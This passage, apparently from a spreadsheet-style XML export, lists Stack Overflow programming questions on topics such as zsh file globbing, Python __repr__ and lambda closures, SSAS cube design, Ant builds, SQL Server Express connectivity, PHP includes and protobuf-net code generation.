&lt;p&gt;However, my filenames contain spaces at least, and perhaps other funky characters, so the above doesn't work. What does work is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;IFS=$(echo -n -e "\0"); FILES=($(find . -name '*.bak' -print0)); unset IFS
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but that's fugly. This is already a bit beyond my comfort limit with zsh syntax, so I'm hoping someone can point me to some basic feature that I never knew about but should.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python object.__repr__(self) should be an expression?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was looking at the builtin object methods in the &lt;a href="http://docs.python.org/reference/datamodel.html#objects-values-and-types"&gt;Python documentation&lt;/a&gt;, and I was interested in the documentation for &lt;code&gt;object.__repr__(self)&lt;/code&gt;. Here's what it says:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Called by the repr() built-in function
  and by string conversions (reverse
  quotes) to compute the â€œofficialâ€
  string representation of an object. If
  at all possible, this should look like
  a valid Python expression that could
  be used to recreate an object with the
  same value (given an appropriate
  environment). If this is not possible,
  a string of the form &amp;lt;...some useful
  description...&gt; should be returned.
  The return value must be a string
  object. If a class defines &lt;strong&gt;repr&lt;/strong&gt;()
  but not &lt;strong&gt;str&lt;/strong&gt;(), then &lt;strong&gt;repr&lt;/strong&gt;() is
  also used when an â€œinformalâ€ string
  representation of instances of that
  class is required.&lt;/p&gt;
  &lt;p&gt;This is typically used for debugging,
  so it is important that the
  representation is information-rich and
  unambiguous&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The most interesting part to me, was...&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;If at all possible, this should look like a valid Python expression that could be used to recreate an object with the same value&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;... but I'm not sure exactly what this means. It says it should &lt;em&gt;look&lt;/em&gt; like an expression which can be used to recreate the object, but does that mean it should just be an example of the sort of expression you could use, or should it be an actual expression, that can be executed (eval etc..) to recreate the object? Or... should it be just a rehasing of the actual expression which was used, for pure information purposes?&lt;/p&gt;
&lt;p&gt;In general I'm a bit confused as to exactly what I should be putting here.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to organize a class hierarchy including an overridable "Update" function</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a base class "Foo" that has an Update() function, which I want to be called once per frame for every instance of that class.  Given an object instance of this class called "foo", then once per frame I will call foo-&gt;Update().&lt;/p&gt;
&lt;p&gt;I have a class "Bar" derived from my base class, that also needs to update every frame.&lt;/p&gt;
&lt;p&gt;I could give the derived class an Update() function, but then I would have to remember to call its base::Update() function - nothing enforces my requirement that the base::Update() function is called because I have overriden it, and could easily just forget to (or choose not to) call the base:Update function.&lt;/p&gt;
&lt;p&gt;So as an alternative I could give the base class a protected OnUpdate() function, which could be made overrideable, and call it from the base::Update() function.  This removes the onus on me to remember to call base::Update() from the derived update function because I'm no longer overriding it.  A Bar instance called "bar" will have bar-&gt;Update() called on it; this will first call the base class' Update() method, which will in turn call the overriden OnUpdate() function, performing the derived class' necessary updates.&lt;/p&gt;
&lt;p&gt;Which solves everything.  Except.  What if I want to derive yet another updatable class, this time from the "Bar" class.&lt;/p&gt;
&lt;p&gt;Baz (which derives from Bar) also has update requirements.  If I put them in Baz's OnUpdate() function, I'm back to the original problem in that I'd have to remember to tell Baz's OnUpdate() function to call Bar's OnUpdate() function, otherwise Bar's OnUpdate() function wouldn't get called.&lt;/p&gt;
&lt;p&gt;So really, I'd want Bar's OnUpdate() function to be non-overridable, and instead for it to call an overridable function after it has done whatever it needed to do, perhaps called OnUpdate2()...&lt;/p&gt;
&lt;p&gt;And if I wanted to derive yet another class?  OnUpdate3? OnUpdate4? AfterUpdate?&lt;/p&gt;
&lt;p&gt;Is there a Better Way?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Further Info:&lt;/p&gt;
&lt;p&gt;My specific problem domain is a 3d world.  I've decided my base class is a "Locator" (an object with a location and orientation).&lt;/p&gt;
&lt;p&gt;My first derived class is a "PhysicsObject" - a Locator that also has mass, velocity, collision information, etc.&lt;/p&gt;
&lt;p&gt;My next derived class is a "Camera" - which derives from PhysicsObject.  As well as position, and velocity, it also has information about the viewport, depth of field, etc.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;MattK suggests simplifying the hierarchy - if a Locator is never referred to, incorporate it into PhysicsObject.&lt;/p&gt;
&lt;p&gt;I'm also thinking about how I would go about turning the layout upside down and using composition instead of inheritance.&lt;/p&gt;
&lt;p&gt;Perhaps a Camera HAS physics properties.
Perhaps a PhysicsObject HAS a location.&lt;/p&gt;
&lt;p&gt;I'll have to think some more about this problem.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;I like Uri's approach: "Observe the contract." Here's the rule - please follow it. Uri is right in that whatever kind of safeguards I try to put in, anyone could circumvent them, so perhaps in this case, the simplest solution is best.  All my update() functions are going to have the requirement of calling their base::update() function.&lt;/p&gt;
&lt;p&gt;Thanks for the help everyone!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I test that I have a Python module successfully installed?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I tried to install beautifulsoup. I get such an error:&lt;br&gt;
&amp;lt;-- snip --&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;raise MissingSectionHeaderError(fpname, lineno, line)
ConfigParser.MissingSectionHeaderError: File contains no section headers.
file: /Users/Sam/.pydistutils.cfg, line: 1
'install_lib = ~/Library/Python/$py_version_short/site-packages\n'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get an similar error as I run my Python code in vim by: 
:!python %&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there an algorithm to determine contiguous colored regions in a grid?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given a basic grid (like a piece of graph paper), where each cell has been randomly filled in with one of n colors, is there a tried and true algorithm out there that can tell me what contiguous regions (groups of cells of the same color that are joined at the side) there are?  Let's say n is something reasonable, like 5.&lt;/p&gt;
&lt;p&gt;I have some ideas, but they all feel horribly inefficient.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's your favorite log4 viewer / monitor?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We've decided to standardize on log4net and log4cxx for our logging infrastructure.  I'd like to give our system administrators and other staff access to the events and information we are logging.  So the short is, I'm looking for some a some recommended tools that help you keep track of the events coming out of your logger.&lt;/p&gt;
&lt;p&gt;Preferably any tool that can do so, could watch for events in real-time so that we can proactively respond, but that could simply be a matter of combining products.&lt;/p&gt;
&lt;p&gt;Here's my short list of products that appear to be easy to integrate with a log4 environment.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Chainsaw&lt;/li&gt;
&lt;li&gt;Log4viewer&lt;/li&gt;
&lt;li&gt;Log4net Dashboard&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What viewers are you using?&lt;/p&gt;
&lt;p&gt;FWIW, there is another question on stackoverflow that at a glance appears to be similar, but the author seems to be looking for a viewer for Enterprise Library, not log4*.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/50575/whats-your-favorite-free-log-viewer-for-entlib-or-log4net"&gt;http://stackoverflow.com/questions/50575/whats-your-favorite-free-log-viewer-for-entlib-or-log4net&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>A SuggestBox for wxPython?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a widget for wxPython like the &lt;a href="http://google-web-toolkit.googlecode.com/svn/javadoc/1.5/index.html" rel="nofollow"&gt;SuggestBox&lt;/a&gt; in Google Web Toolkit? It is basically a magic text box that can invoke some code to come up with suggestions relevant to whatever the user has entered so far. Like the search box on Google's web page.&lt;/p&gt;
&lt;p&gt;If such a widget isn't already floating out there, I'd appreciate a sketch of how I might implement it with the existing widgets.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to tell when a QTMovie starts playing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So &lt;code&gt;QTMovie&lt;/code&gt;s have &lt;code&gt;QTMovieDidEndNotification&lt;/code&gt;, but no &lt;code&gt;QTMovieDidStartNotification&lt;/code&gt;. How can I be notified when a &lt;code&gt;QTMovie&lt;/code&gt; starts playing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SSAS cube design, semi-additive measures, and running totals</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have what is to me a bit of a tricky design issue in my SSAS cube.  The question is related to general accounting practices, I have a fact table containing financial transactions (i.e. a ledger) and each of those transactions is tagged with a transaction date and a period.  The period does NOT related directly to a day, or a series of days.  Users may close a period in the middle of a day if that is when they have finished their months work.  &lt;/p&gt;
&lt;p&gt;I need to be able to report on Accounts Receivable (AR) by both date and period.  I am not using Enterprise Edition of SSAS so the time intelligence semi-additive options are not availabe to me, and even if they were they would only allow one time dimension to use non-standard aggregation and I believe in this case I need two that allow this.&lt;/p&gt;
&lt;p&gt;Accounts Receivable is a running total, it should be the sum of the latest ledger item selected and everything that came before it.  I know how do do this calculation in MDX for a single time dimension, but how can I allow this to work with two time dimensions, transaction date, and period close?  Is period close even considered a "time" dimension in this case?  It does have a temporal aspect to it, and I do want the sums from all periods up to the current.&lt;/p&gt;
&lt;p&gt;I am stumped on how to related the two time dimensions to a single fact table and use different aggregation for each.  Maybe the best solution here is to have two periodic snapshot tables (instead of trying to aggregate this info from the FactLedger table), one aggregated by transaction date and one by period which is the solution I am currently leaning towards but I would love a second opinion.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# enumeration property null vs. 0</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using IIS/asmx to support a Flash client.  Some of my service layer data transfer objects have properties that are enumeration values.  There are cases where these properties should be null.  &lt;/p&gt;
&lt;p&gt;When an object with a null value for such an enumeration property is rendered to soap, I receive this error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;System.InvalidOperationException: There was an error generating the XML document. ---&amp;gt; System.InvalidOperationException: Instance validation error: '0' is not a valid value for NameSpaceX.Model.NodeType.
   at Microsoft.Xml.Serialization.GeneratedAssembly.XmlSerializationWriter1.Write1_NodeType(NodeType v)
   at Microsoft.Xml.Serialization.GeneratedAssembly.XmlSerializationWriter1.Write4_PackageDTO(String n, String ns, PackageDTO o, Boolean isNullable, Boolean needType)
   at Microsoft.Xml.Serialization.GeneratedAssembly.XmlSerializationWriter1.Write15_ArrayOfPackageDTO(Object o)
   at Microsoft.Xml.Serialization.GeneratedAssembly.ListOfPackageDTOSerializer1.Serialize(Object objectToSerialize, XmlSerializationWriter writer)
   at System.Xml.Serialization.XmlSerializer.Serialize(XmlWriter xmlWriter, Object o, XmlSerializerNamespaces namespaces, String encodingStyle, String id)
   --- End of inner exception stack trace ---
   at System.Xml.Serialization.XmlSerializer.Serialize(XmlWriter xmlWriter, Object o, XmlSerializerNamespaces namespaces, String encodingStyle, String id)
   at System.Xml.Serialization.XmlSerializer.Serialize(TextWriter textWriter, Object o, XmlSerializerNamespaces namespaces)
   at System.Xml.Serialization.XmlSerializer.Serialize(TextWriter textWriter, Object o)
   at System.Web.Services.Protocols.XmlReturnWriter.Write(HttpResponse response, Stream outputStream, Object returnValue)
   at System.Web.Services.Protocols.HttpServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
   at System.Web.Services.Protocols.WebServiceHandler.WriteReturns(Object[] returnValues)
   at System.Web.Services.Protocols.WebServiceHandler.Invoke()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a better solution then to create an enumeration member with value 0 (e.g. [0, "null"]?  I suspect that I'm lacking basic knowledge here.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I create a list of Python lambdas (in a list comprehension/for loop)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to create a list of lambda objects from a list of constants in Python; for instance:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;listOfNumbers = [1,2,3,4,5]
square = lambda x: x * x
listOfLambdas = [lambda: square(i) for i in listOfNumbers]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This will create a list of lambda objects, however, when I run them:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for f in listOfLambdas:
    print f(),
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would expect that it would print&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;1 4 9 16 25
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Instead, it prints:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;25 25 25 25 25
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It seems as though the lambdas have all been given the wrong parameter. Have I done something wrong, and is there a way to fix it? I'm in Python 2.4 I think.&lt;/p&gt;
&lt;p&gt;EDIT: a bit more of trying things and such came up with this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;listOfLambdas = []
for num in listOfNumbers:
    action = lambda: square(num)
    listOfLambdas.append(action)
    print action()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Prints the expected squares from 1 to 25, but then using the earlier print statement:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for f in listOfLambdas:
    print f(),
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;still gives me all &lt;code&gt;25&lt;/code&gt;s. How did the existing lambda objects change between those two print calls?&lt;/p&gt;
&lt;p&gt;Related question: &lt;a href="http://stackoverflow.com/questions/139819/why-results-of-map-and-list-comprehension-are-different"&gt;Why results of map() and list comprehension are different?&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Suggest a JPA Unit test framework</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to unit test JPA code? is there any way to generate Unit Test case itself? &lt;/p&gt;
&lt;p&gt;Note: I am lazy and new to Unit Test code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Implementation of Single Responsibility Principle</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I break my Objects down to 'Single Responsibilities', is there a fundamental thought whether like objects should live together or separately, for example if I have&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Employee_DataProvider() : IEmployee_DataProvider { ... };
class Employee_Details() : IEmployee_Details { ... };
class Employee_Payroll() : IPayroll() { ... };
class Employee_LeaveProcessing() : ILeaveProcessing_Client { ... };
...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is it  bad smell to have all these living inside, yet loosely coupled to through interfaces, an owning Employee class:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Employee
{
    IEmployee_DataProvider _dataProvider;
    IEmployee_Details _details;
    IPayroll _payroll;
    ILeaveProcessing_Client _leaveProcessing;
    //My functions call the interfaces above
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or is the thinking more around keeping these classes completely separate (or as least as separate as is posible) in the code? Or are both these methods a valid usage of SRP?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; I do not want critique on the feasibility of the object given in the example, I just made it up to illustrate the question. I agree data, leave and payroll processing are not the domain of the employee class. &lt;/p&gt;
&lt;p&gt;It does appear though that SRP is asking me to move away from the object as real world representation to object as a properties and methods around a single functional concept&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why the slow WADL uptake?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been researching WADL and am wondering why it isn't more widely adopted?  &lt;/p&gt;
&lt;p&gt;With the rate at which REST usage seems to be growing, I'm surprised that more development efforts don't use it.&lt;/p&gt;
&lt;p&gt;Is there are fundamental flaw in its design, is it not a good match for the culture that typically surrounds RESTful web services, or is it something else entirely?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>String altering in Ant</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given a property:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;property name="classes" value="com.package.Class1,com.package.Class2" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm trying to compile only the classes specified like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;javac srcdir="${src.dir}" destdir="${build.dir}"&amp;gt;
    &amp;lt;include name="${classes}" /&amp;gt;
&amp;lt;/javac&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However the 'include' tag is specifying the file names to include, not the qualified class names.&lt;/p&gt;
&lt;p&gt;Is there a way I can create a new property/include tag that has all the classes in 'classes' in the correct format? ie. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"com.package.Class1" -&amp;gt; "com\\package\\Class1.java"
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>All the reasons I can't access an instance of SQL 2005</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've installed an instance of SQL 2005 Express on &lt;code&gt;&amp;lt;computername&amp;gt;/SQLEXPRESS&lt;/code&gt;. There is only once instance installed. I've allowed remote connections, turned on SQL authentication, enabled TCP/IP, Named Pipes and VIA but I still can't access the database from another computer. I keep getting:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;A network-related or instance-specific
  error occurred while establishing a
  connection to SQL Server. The server
  was not found or was not accessible.
  Verify that the instance name is
  correct and that SQL Server is
  configured to allow remote
  connections. (provider: SQL Network
  Interfaces, error: 26 - Error Locating
  Server/Instance Specified)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What else can I look for? I'm sure my code is correct as it was used to connect to this same system prior to it being wiped. I'm pretty confident the connection string is correct as well:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Server=&amp;lt;computername&amp;gt;\SQLEXPRESS;User Id=&amp;lt;username&amp;gt;;Password=&amp;lt;password&amp;gt;;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There's also no firewalls standing between the two systems. They're on the same network segment and Windows Firewall has been shut off completely.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to add a server image control to html container using innerHTML =</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a td that I want to inject with a server image control (asp.net) using innerHTML = "". The webcontrol's toString is giving the type.&lt;/p&gt;
&lt;p&gt;Is there a way to extract the generated  from the server control?
Or, is there a different solution...?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I create a product key for my C# application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I create a product key for my C# Application?&lt;/p&gt;
&lt;p&gt;I need to create a product (or license) key that I update annually.  Additionally I need to create one for trial versions.&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Related:  &lt;/p&gt;
  &lt;ul&gt;
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/501988/how-do-i-best-obfuscate-my-c-product-license-verification-code"&gt;How do I best obfuscate my C# product license verification code?&lt;/a&gt;  &lt;/li&gt;
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/437049/web-based-license-activation"&gt;Web-based license activation&lt;/a&gt;  &lt;/li&gt;
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/109997/how-do-you-protect-your-software-from-illegal-distribution"&gt;How do you protect your software from illegal distribution?&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/118031/best-activation-key-software-for-net-application"&gt;Best activation key software for .NET application?&lt;/a&gt;&lt;/li&gt;
  &lt;/ul&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>Using ant to detect os and set property</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to set a property in an ant task differently by os type.&lt;/p&gt;
&lt;p&gt;The property is a directory, in windows i want it to be "c:\flag" in unix/linux "/opt/flag".&lt;/p&gt;
&lt;p&gt;My current script only works when i run it with the default target, but why ?
 &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    &amp;lt;target name="checksw_path" depends="if_windows, if_unix"/&amp;gt;
&amp;lt;target name="checkos"&amp;gt;
	&amp;lt;condition property="isWindows"&amp;gt;
		&amp;lt;os family="windows" /&amp;gt;
	&amp;lt;/condition&amp;gt;
	&amp;lt;condition property="isLinux"&amp;gt;
		&amp;lt;os family="unix" /&amp;gt;
	&amp;lt;/condition&amp;gt;
&amp;lt;/target&amp;gt;
&amp;lt;target name="if_windows" depends="checkos" if="isWindows"&amp;gt;
   &amp;lt;property name="sw.root" value="c:\flag" /&amp;gt;
	&amp;lt;echo message="${sw.root}"/&amp;gt;
&amp;lt;/target&amp;gt;
&amp;lt;target name="if_unix" depends="checkos" if="isLinux"&amp;gt;
	&amp;lt;property name="sw.root" value="/opt/flag" /&amp;gt;
	&amp;lt;echo message="${sw.root}"/&amp;gt;
&amp;lt;/target&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In all my ant targets i've added a "depends=checksw_path".&lt;/p&gt;
&lt;p&gt;If i run the default target in windows i've got correctly "c:\flag" but if i run a non default target i've got that the debug goes in the if_windows but the instruction "  " does not set the property that remains /opt/flag. I'm using ant 1.7.1.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Running DOS games under Dosbox 0.72</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Windows Vista and with Dosbox 0.72 to load Turbo C for programming a DOS game.  My code runs fine (both graphics and sound routines) as long as it runs under DOS shell of Turbo C (Under Dosbox).  But when I run the same code under DosBox (outside Turbo C's Dos shell), the graphics flickers, slows down and the sound cracks. Whats wrong??&lt;/p&gt;
&lt;p&gt;Pramod&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Process Guidelines Required</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My company does not follow any well defined process for software development. I want to implement a simple but effective process which will suit my company. &lt;/p&gt;
&lt;p&gt;We have all sets of resources right from project managers to developers and testers.&lt;/p&gt;
&lt;p&gt;Please provide some references or process templates that I can use.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>To what extent can Version Control help in system administration?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently tinkering at an OpenBSD system with a view to building myself a firewall and some other bits and bobs.&lt;/p&gt;
&lt;p&gt;As this is fairly experimental (I'm an OpenBSD n00b, and I've already trashed my system 3 or 4 times), I wonder what experience others have of making part or all of the file system (I'm thinking in particular of /etc) a working copy of some VCS or other.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Is this a good idea?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I'm particularly interested in which VCS people have used for this. I'm considering subversion, bazaar, and git; this won't be a shared repository, so I'm perhaps more interested in the basic vcs functionality than the distributed-or-not argument.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I'd also like to hear about imagined or actual pitfalls people have found. I can imagine the preservation of file ownership and permissions needs careful thought!&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;And, of course, any alternative approaches not involving VCS&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>ASP.NET Web application security in VDS hosting</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are designing asp.net web application in wcsf. Web application will be deployed to Windows Server 2003 shared &lt;a href="http://en.wikipedia.org/wiki/Virtual_private_server" rel="nofollow"&gt;VDS&lt;/a&gt; hosting. Web site will be used for b2b, monthly service fee and credit card transactions used in web application so it must be secure site. I want to consider what must be done before deployment and i need an answer to a few questions:&lt;/p&gt;
&lt;p&gt;1) How can i copy protect my site &amp;amp; my code. Is code signing enough? What should i do for reflector protection? Obfuscation is enough?&lt;/p&gt;
&lt;p&gt;2) What about Windows Server 2003 &lt;a href="http://en.wikipedia.org/wiki/Virtual_private_server" rel="nofollow"&gt;VDS&lt;/a&gt; hosting pros &amp;amp; cons?&lt;/p&gt;
&lt;p&gt;3) MS SQL Server 2005 Express is suitable for that kind of business use? Limitation of mssql express (4GB storage and 1Gb ram) cause bottlenecks in website? &lt;/p&gt;
&lt;p&gt;4) Can I transfer database from express edition to mssql 2005 workgroup edition in the future without problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Shell script for adjusting image size</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to adjust all image sizes in a directory?&lt;/p&gt;
&lt;p&gt;If I set the max size to 800x600 it will make larger ones smaller and leave smaller ones at their original size.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Help with include function</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Im trying to make a simple template system in PHP. I'm new to PHP, so it's nothing serious. I have some problems though:&lt;/p&gt;
&lt;p&gt;A regular include works:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$variable = "test";
include("templates/news.html");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this won't:&lt;/p&gt;
&lt;p&gt;This says &lt;code&gt;$variable&lt;/code&gt; is undefined:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$variable = "test";
getTemplate("news");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The Function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function getTemplate($tpl) {
    $file = "templates/$tpl.html";
    if (file_exists($file))
        return include($file);
    return false;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;news.html&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;h1&amp;gt;php echo $variable&amp;lt;/h1&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the function works and includes the page but it dont write out the variables&lt;/p&gt;
&lt;p&gt;I include the function on top of all pages.&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>COM event handling in C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;b&gt;Without&lt;/b&gt; the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ATL&lt;/li&gt;
&lt;li&gt;MFC&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;b&gt;Question:&lt;/b&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;How to get the COM &lt;b&gt;Server&lt;/b&gt;, to report back to the COM &lt;b&gt;Client&lt;/b&gt;, once a particular event has terminated?
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Regards&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java's Virtual Machine and CLR</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As a sort of follow up to the question called &lt;a href="http://stackoverflow.com/questions/95163/differences-between-msil-and-java-bytecode"&gt;Differences between MSIL and Java bytecode?&lt;/a&gt;, what is the (major) differences or similarity in how the Java Virtual Machine works versus how the &lt;del&gt;.NET Framework&lt;/del&gt; Common Language Runtime (CLR) works?&lt;/p&gt;
&lt;p&gt;Also, is the &lt;del&gt;.NET framework&lt;/del&gt; CLR a "virtual machine" or does it not have the attributes of a virtual machine? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which numerical values do the F-Keys ( F[1-12]) and the Arrow-keys have?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to write an application in C which uses arrow-keys to navigate and F-keys for other functions, such as saving to a file, language selection, etc.&lt;/p&gt;
&lt;p&gt;Propably the values depend on the platform, so how could I find out which values the keys have?&lt;/p&gt;
&lt;p&gt;If they don't, or if you know them, I don't have to know how to find out;)&lt;/p&gt;
&lt;p&gt;Edit:
My platforms are Linux and M$ Windows.
Therefore, I'm looking for a solution as portable as possible.&lt;/p&gt;
&lt;p&gt;(Propably something like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#ifdef __unix__
   #define F1 'some number'
   /* ... */
   #define ARROW_UP 'some other number'
#elif __WIN32__ || MSDOS /*whatever*/
   #define F1 'something'
   /* ... */
   #define ARROW_UP 'something different'
#endif
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Protocol buffers in C# projects using protobuf-net - best practices for code generation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to use protobuf in a C# project, using protobuf-net, and am wondering what is the best way to organise this into a Visual Studio project structure.&lt;/p&gt;
&lt;p&gt;When manually using the protogen tool to generate code into C#, life seems easy but it doesn't feel right.&lt;/p&gt;
&lt;p&gt;I'd like the .proto file to be considered to be the primary source-code file, generating C# files as a by-product, but before the C# compiler gets involved.&lt;/p&gt;
&lt;p&gt;The options seem to be:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Custom tool for proto tools (although I can't see where to start there)&lt;/li&gt;
&lt;li&gt;Pre-build step (calling protogen or a batch-file which does that)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I have struggled with 2) above as it keeps giving me "The system cannot find the file specified" unless I use absolute paths (and I don't like forcing projects to be explicitly located).&lt;/p&gt;
&lt;p&gt;Is there a convention (yet) for this?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;Edit:&lt;/em&gt;&lt;/strong&gt;
Based upon @jon's comments, I retried the pre-build step method and used this (protogen's location hardcoded for now), using Google's address-book example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;c:\bin\protobuf\protogen "-i:$(ProjectDir)AddressBook.proto" 
       "-o:$(ProjectDir)AddressBook.cs" -t:c:\bin\protobuf\csharp.xslt
&lt;/code&gt;&lt;/pre&gt;
